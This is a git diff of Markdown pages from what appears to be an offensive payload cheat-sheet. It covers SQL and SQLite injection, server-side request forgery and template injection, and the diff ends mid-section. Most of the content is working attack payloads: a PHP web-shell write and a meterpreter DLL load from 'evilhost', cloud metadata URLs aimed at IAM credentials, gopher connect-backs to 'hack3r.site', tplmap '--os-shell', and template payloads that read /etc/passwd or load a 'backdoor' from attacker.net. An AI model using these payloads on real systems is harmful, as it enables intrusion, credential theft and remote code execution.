||||
|
||||
```sql
|
||||
?id=(1)and(1)=(1)--
|
||||
```
|
||||
|
||||
No Comma - bypass using OFFSET, FROM and JOIN
|
||||
|
||||
```sql
|
||||
LIMIT 0,1 -> LIMIT 1 OFFSET 0
|
||||
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
||||
@ -334,6 +355,7 @@ SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELE
|
||||
```
|
||||
|
||||
Blacklist using keywords - bypass using uppercase/lowercase
|
||||
|
||||
```sql
|
||||
?id=1 AND 1=1#
|
||||
?id=1 AnD 1=1#
|
||||
@ -341,6 +363,7 @@ Blacklist using keywords - bypass using uppercase/lowercase
|
||||
```
|
||||
|
||||
Blacklist using keywords case insensitive - bypass using an equivalent operator
|
||||
|
||||
```sql
|
||||
AND -> &&
|
||||
OR -> ||
|
||||
@ -350,6 +373,7 @@ WHERE -> HAVING
|
||||
```
|
||||
|
||||
Information_schema.tables Alternative
|
||||
|
||||
```sql
|
||||
select * from mysql.innodb_table_stats;
|
||||
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
|
||||
@ -367,10 +391,10 @@ mysql> show tables in dvwa;
|
||||
| guestbook |
|
||||
| users |
|
||||
+----------------+
|
||||
|
||||
```
|
||||
|
||||
Version Alternative
|
||||
|
||||
```sql
|
||||
mysql> select @@innodb_version;
|
||||
+------------------+
|
||||
@ -394,37 +418,36 @@ mysql> mysql> select version();
|
||||
+-------------------------+
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Thanks to - Other resources
|
||||
|
||||
* Detect SQLi
|
||||
- [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
|
||||
- [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
|
||||
* [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
|
||||
* [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
|
||||
* MySQL:
|
||||
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
|
||||
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
||||
- [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
|
||||
- [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
|
||||
* [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
|
||||
* [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
||||
* [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
|
||||
* [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
|
||||
* MSSQL:
|
||||
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
||||
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||
* [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
||||
* [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||
* ORACLE:
|
||||
- [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
|
||||
* [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
|
||||
* POSTGRESQL:
|
||||
- [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
|
||||
* [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
|
||||
* Others
|
||||
- [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
||||
- [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
|
||||
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
|
||||
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
|
||||
- [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
|
||||
- [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
|
||||
- [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
|
||||
- [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
|
||||
- [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
|
||||
- [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
|
||||
* [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
||||
* [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
|
||||
* [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
|
||||
* [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
|
||||
* [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
|
||||
* [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
|
||||
* [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
|
||||
* [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
|
||||
* [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
|
||||
* [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
|
||||
* Second Order:
|
||||
- [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
|
||||
- [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
|
||||
* [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
|
||||
* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
|
||||
* Sqlmap:
|
||||
- [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
|
||||
* [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
|
@ -1,53 +1,64 @@
|
||||
# SQLite Injection
|
||||
|
||||
## SQLite comments
|
||||
|
||||
```sql
|
||||
--
|
||||
/**/
|
||||
```
|
||||
|
||||
## SQLite version
|
||||
|
||||
```sql
|
||||
select sqlite_version();
|
||||
```
|
||||
|
||||
## Integer/String based - Extract table name
|
||||
|
||||
```sql
|
||||
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
|
||||
```
|
||||
|
||||
Use limit X+1 offset X, to extract all tables.
|
||||
|
||||
## Integer/String based - Extract column name
|
||||
|
||||
```sql
|
||||
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
||||
```
|
||||
|
||||
For a clean output
|
||||
|
||||
```sql
|
||||
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
||||
```
|
||||
|
||||
## Boolean - Count number of tables
|
||||
|
||||
```sql
|
||||
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
|
||||
```
|
||||
|
||||
## Boolean - Enumerating table name
|
||||
|
||||
```sql
|
||||
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
|
||||
```
|
||||
|
||||
## Boolean - Extract info
|
||||
|
||||
```sql
|
||||
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
|
||||
```
|
||||
|
||||
## Time based
|
||||
|
||||
```sql
|
||||
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
||||
```
|
||||
|
||||
## Remote Command Execution using SQLite command - Attach Database
|
||||
|
||||
```sql
|
||||
ATTACH DATABASE '/var/www/lol.php' AS lol;
|
||||
CREATE TABLE lol.pwn (dataz text);
|
||||
@ -55,10 +66,13 @@ INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
|
||||
```
|
||||
|
||||
## Remote Command Execution using SQLite command - Load_extension
|
||||
|
||||
```sql
|
||||
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
||||
```
|
||||
|
||||
Note: By default this component is disabled
|
||||
|
||||
## Thanks to
|
||||
|
||||
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
|
||||
|
@ -1,27 +1,29 @@
|
||||
# Server-Side Request Forgery
|
||||
|
||||
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
|
||||
|
||||
## Summary
|
||||
* [Exploit with localhost]()
|
||||
* [Bypassing filters]()
|
||||
* [SSRF via URL Scheme]()
|
||||
* [SSRF to XSS]()
|
||||
* [SSRF URL for Cloud Instances]()
|
||||
* [SSRF URL for AWS Bucket]()
|
||||
* [SSRF URL for Google Cloud]()
|
||||
* [SSRF URL for Digital Ocean]()
|
||||
* [SSRF URL for Packetcloud]()
|
||||
* [SSRF URL for Azure]()
|
||||
* [SSRF URL for OpenStack/RackSpace]()
|
||||
* [SSRF URL for HP Helion]()
|
||||
* [SSRF URL for Oracle Cloud]()
|
||||
* [SSRF URL for Alibaba]()
|
||||
|
||||
* [Exploit with localhost](#summary)
|
||||
* [Bypassing filters](#summary)
|
||||
* [SSRF via URL Scheme](#summary)
|
||||
* [SSRF to XSS](#summary)
|
||||
* [SSRF URL for Cloud Instances](#summary)
|
||||
* [SSRF URL for AWS Bucket](#summary)
|
||||
* [SSRF URL for Google Cloud](#summary)
|
||||
* [SSRF URL for Digital Ocean](#summary)
|
||||
* [SSRF URL for Packetcloud](#summary)
|
||||
* [SSRF URL for Azure](#summary)
|
||||
* [SSRF URL for OpenStack/RackSpace](#summary)
|
||||
* [SSRF URL for HP Helion](#summary)
|
||||
* [SSRF URL for Oracle Cloud](#summary)
|
||||
* [SSRF URL for Alibaba](#summary)
|
||||
|
||||
## Exploit with localhost
|
||||
|
||||
Basic SSRF v1
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://127.0.0.1:80
|
||||
http://127.0.0.1:443
|
||||
http://127.0.0.1:22
|
||||
@ -30,63 +32,72 @@ http://0.0.0.0:443
|
||||
http://0.0.0.0:22
|
||||
```
|
||||
|
||||
Basic SSRF v2
|
||||
```
|
||||
Basic SSRF - Alternative version
|
||||
|
||||
```powershell
|
||||
http://localhost:80
|
||||
http://localhost:443
|
||||
http://localhost:22
|
||||
```
|
||||
|
||||
Advanced exploit using a redirection
|
||||
```
|
||||
|
||||
```powershell
|
||||
1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com
|
||||
2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
|
||||
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
||||
```
|
||||
|
||||
Advanced exploit using type=url
|
||||
```
|
||||
|
||||
```powershell
|
||||
Change "type=file" to "type=url"
|
||||
Paste URL in text field and hit enter
|
||||
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
||||
```
|
||||
|
||||
## Bypassing filters
|
||||
|
||||
Bypass using HTTPS
|
||||
```
|
||||
|
||||
```powershell
|
||||
https://127.0.0.1/
|
||||
https://localhost/
|
||||
```
|
||||
|
||||
Bypass localhost with [::]
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://[::]:80/
|
||||
http://[::]:25/ SMTP
|
||||
http://[::]:22/ SSH
|
||||
http://[::]:3128/ Squid
|
||||
```
|
||||
|
||||
```
|
||||
```powershell
|
||||
http://0000::1:80/
|
||||
http://0000::1:25/ SMTP
|
||||
http://0000::1:22/ SSH
|
||||
http://0000::1:3128/ Squid
|
||||
```
|
||||
|
||||
|
||||
Bypass localhost with a domain redirecting to locahost
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://localtest.me
|
||||
http://n-pn.info
|
||||
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
|
||||
```
|
||||
|
||||
The service nip.io is awesome for that, it will convert any ip address as a dns.
|
||||
```
|
||||
|
||||
```powershell
|
||||
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
|
||||
```
|
||||
|
||||
Bypass localhost with CIDR : 127.x.x.x
|
||||
```
|
||||
|
||||
```powershell
|
||||
it's a /8
|
||||
http://127.127.127.127
|
||||
http://127.0.1.3
|
||||
@ -94,7 +105,8 @@ http://127.0.0.0
|
||||
```
|
||||
|
||||
Bypass using a decimal ip location
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://0177.0.0.1/
|
||||
http://2130706433/ = http://127.0.0.1
|
||||
http://3232235521/ = http://192.168.0.1
|
||||
@ -102,25 +114,28 @@ http://3232235777/ = http://192.168.1.1
|
||||
```
|
||||
|
||||
Bypass using malformed urls
|
||||
```
|
||||
|
||||
```powershell
|
||||
localhost:+11211aaa
|
||||
localhost:00011211aaaa
|
||||
```
|
||||
|
||||
Bypass using rare address
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://0/
|
||||
```
|
||||
|
||||
Bypass using bash variables (curl only)
|
||||
```
|
||||
curl -v "http://evil$google.com"
|
||||
|
||||
```powershell
|
||||
curl -v "http://evil$google.com"
|
||||
$google = ""
|
||||
```
|
||||
|
||||
Bypass using tricks combination
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
|
||||
urllib2 : 1.1.1.1
|
||||
requests + browsers : 2.2.2.2
|
||||
@ -128,40 +143,45 @@ urllib : 3.3.3.3
|
||||
```
|
||||
|
||||
Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
|
||||
|
||||
List:
|
||||
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
||||
```
|
||||
|
||||
|
||||
## SSRF via URL Scheme
|
||||
|
||||
Dict://
|
||||
Dict Wrapper
|
||||
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
|
||||
```
|
||||
|
||||
```powershell
|
||||
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
|
||||
ssrf.php?url=dict://attacker:11111/
|
||||
```
|
||||
|
||||
Sftp://
|
||||
```
|
||||
Sftp Wrapper
|
||||
|
||||
```powershell
|
||||
ssrf.php?url=sftp://evil.com:11111/
|
||||
```
|
||||
|
||||
Tftp://
|
||||
```
|
||||
Tftp Wrapper
|
||||
|
||||
```powershell
|
||||
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
|
||||
```
|
||||
|
||||
Ldap://
|
||||
```
|
||||
Ldap Wrapper
|
||||
|
||||
```powershell
|
||||
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
|
||||
```
|
||||
|
||||
Gopher://
|
||||
```
|
||||
Gopher Wrapper
|
||||
|
||||
```powershell
|
||||
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
|
||||
|
||||
will make a request like
|
||||
@ -181,7 +201,8 @@ You didn't say the magic word !
|
||||
QUIT
|
||||
```
|
||||
|
||||
Gopher:// SMTP - Back connect to 1337
|
||||
Gopher SMTP - Back connect to 1337
|
||||
|
||||
```php
|
||||
Content of evil.com/redirect.php:
|
||||
<?php
|
||||
@ -191,7 +212,9 @@ header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
|
||||
Now query it.
|
||||
https://example.com/?q=http://evil.com/redirect.php.
|
||||
```
|
||||
Gopher:// SMTP - send a mail
|
||||
|
||||
Gopher SMTP - send a mail
|
||||
|
||||
```php
|
||||
Content of evil.com/redirect.php:
|
||||
<?php
|
||||
@ -212,26 +235,30 @@ Content of evil.com/redirect.php:
|
||||
```
|
||||
|
||||
## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
||||
|
||||
```bash
|
||||
http://brutelogic.com.br/poc.svg -> simple alert
|
||||
http://brutelogic.com.br/poc.svg -> simple alert
|
||||
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf
|
||||
|
||||
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
|
||||
```
|
||||
|
||||
|
||||
## SSRF URL for Cloud Instances
|
||||
|
||||
### SSRF URL for AWS Bucket
|
||||
|
||||
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
|
||||
Interesting path to look for at http://169.254.169.254
|
||||
```
|
||||
Interesting path to look for at `http://169.254.169.254`
|
||||
|
||||
```powershell
|
||||
Always here : /latest/meta-data/{hostname,public-ipv4,...}
|
||||
User data (startup script for auto-scaling) : /latest/user-data
|
||||
Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
|
||||
```
|
||||
|
||||
DNS record
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://169.254.169.254
|
||||
http://metadata.nicob.net/
|
||||
http://169.254.169.254.xip.io/
|
||||
@ -240,13 +267,15 @@ http://www.owasp.org.1ynrnhl.xip.io/
|
||||
```
|
||||
|
||||
HTTP redirect
|
||||
```
|
||||
|
||||
```powershell
|
||||
Static:http://nicob.net/redir6a
|
||||
Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
|
||||
```
|
||||
|
||||
Alternate IP encoding
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://425.510.425.510/ Dotted decimal with overflow
|
||||
http://2852039166/ Dotless decimal
|
||||
http://7147006462/ Dotless decimal with overflow
|
||||
@ -258,7 +287,8 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
|
||||
```
|
||||
|
||||
More urls to include
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://169.254.169.254/latest/user-data
|
||||
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
|
||||
http://169.254.169.254/latest/meta-data/
|
||||
@ -272,8 +302,10 @@ http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
|
||||
```
|
||||
|
||||
### SSRF URL for Google Cloud
|
||||
|
||||
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://169.254.169.254/computeMetadata/v1/
|
||||
http://metadata.google.internal/computeMetadata/v1/
|
||||
http://metadata/computeMetadata/v1/
|
||||
@ -282,19 +314,22 @@ http://metadata.google.internal/computeMetadata/v1/instance/id
|
||||
http://metadata.google.internal/computeMetadata/v1/project/project-id
|
||||
```
|
||||
|
||||
Google allows recursive pulls
|
||||
```
|
||||
Google allows recursive pulls
|
||||
|
||||
```powershell
|
||||
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
|
||||
```
|
||||
|
||||
Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://metadata.google.internal/computeMetadata/v1beta1/
|
||||
```
|
||||
|
||||
|
||||
### SSRF URL for Digital Ocean
|
||||
https://developers.digitalocean.com/documentation/metadata/
|
||||
|
||||
Documentation available at `https://developers.digitalocean.com/documentation/metadata/`
|
||||
|
||||
```powershell
|
||||
curl http://169.254.169.254/metadata/v1/id
|
||||
http://169.254.169.254/metadata/v1.json
|
||||
@ -310,36 +345,43 @@ curl http://169.254.169.254/metadata/v1.json | jq
|
||||
```
|
||||
|
||||
### SSRF URL for Packetcloud
|
||||
```
|
||||
https://metadata.packet.net/userdata
|
||||
```
|
||||
|
||||
Documentation available at `https://metadata.packet.net/userdata`
|
||||
|
||||
### SSRF URL for Azure
|
||||
Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
|
||||
```
|
||||
|
||||
Limited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`
|
||||
|
||||
```powershell
|
||||
http://169.254.169.254/metadata/v1/maintenance
|
||||
```
|
||||
|
||||
Update Apr 2017, Azure has more support; requires the header "Metadata: true" https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
|
||||
```
|
||||
Update Apr 2017, Azure has more support; requires the header "Metadata: true" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`
|
||||
|
||||
```powershell
|
||||
http://169.254.169.254/metadata/instance?api-version=2017-04-02
|
||||
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
|
||||
```
|
||||
|
||||
### SSRF URL for OpenStack/RackSpace
|
||||
### SSRF URL for OpenStack/RackSpace
|
||||
|
||||
(header required? unknown)
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://169.254.169.254/openstack
|
||||
```
|
||||
|
||||
### SSRF URL for HP Helion
|
||||
### SSRF URL for HP Helion
|
||||
|
||||
(header required? unknown)
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://169.254.169.254/2009-04-04/meta-data/
|
||||
```
|
||||
|
||||
### SSRF URL for Oracle Cloud
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://192.0.0.192/latest/
|
||||
http://192.0.0.192/latest/user-data/
|
||||
http://192.0.0.192/latest/meta-data/
|
||||
@ -347,14 +389,15 @@ http://192.0.0.192/latest/attributes/
|
||||
```
|
||||
|
||||
### SSRF URL for Alibaba
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://100.100.100.200/latest/meta-data/
|
||||
http://100.100.100.200/latest/meta-data/instance-id
|
||||
http://100.100.100.200/latest/meta-data/image-id
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
||||
* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
|
||||
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
||||
|
@ -1,29 +1,34 @@
|
||||
# Templates Injections
|
||||
|
||||
> Template injection allows an attacker to include template code into an existant (or not) template.
|
||||
> Template injection allows an attacker to include template code into an existant (or not) template.
|
||||
|
||||
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
|
||||
e.g:
|
||||
```
|
||||
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
|
||||
|
||||
```powershell
|
||||
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
|
||||
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
|
||||
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
|
||||
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
|
||||
```
|
||||
|
||||
## Ruby
|
||||
|
||||
### Basic injection
|
||||
|
||||
```python
|
||||
<%= 7 * 7 %>
|
||||
```
|
||||
|
||||
### Retrieve /etc/passwd
|
||||
|
||||
```python
|
||||
<%= File.open('/etc/passwd').read %>
|
||||
```
|
||||
|
||||
## Java
|
||||
|
||||
### Java - Basic injection
|
||||
|
||||
## Java
|
||||
### Basic injection
|
||||
```java
|
||||
${7*7}
|
||||
${{7*7}}
|
||||
@ -32,24 +37,29 @@ ${class.getResource("").getPath()}
|
||||
${class.getResource("../../../../../index.htm").getContent()}
|
||||
```
|
||||
|
||||
### Retrieve the system’s environment variables.
|
||||
### Java - Retrieve the system’s environment variables
|
||||
|
||||
```java
|
||||
${T(java.lang.System).getenv()}
|
||||
```
|
||||
|
||||
### Retrieve /etc/passwd
|
||||
### Java - Retrieve /etc/passwd
|
||||
|
||||
```java
|
||||
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||
```
|
||||
|
||||
## Twig
|
||||
### Basic injection
|
||||
|
||||
### Twig - Basic injection
|
||||
|
||||
```python
|
||||
{{7*7}}
|
||||
{{7*'7'}} would result in 49
|
||||
```
|
||||
|
||||
### Template format
|
||||
### Twig - Template format
|
||||
|
||||
```python
|
||||
$output = $twig > render (
|
||||
'Dear' . $_GET['custom_greeting'],
|
||||
@ -62,28 +72,32 @@ $output = $twig > render (
|
||||
);
|
||||
```
|
||||
|
||||
### Code execution
|
||||
### Twig - Code execution
|
||||
|
||||
```python
|
||||
{{self}}
|
||||
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
||||
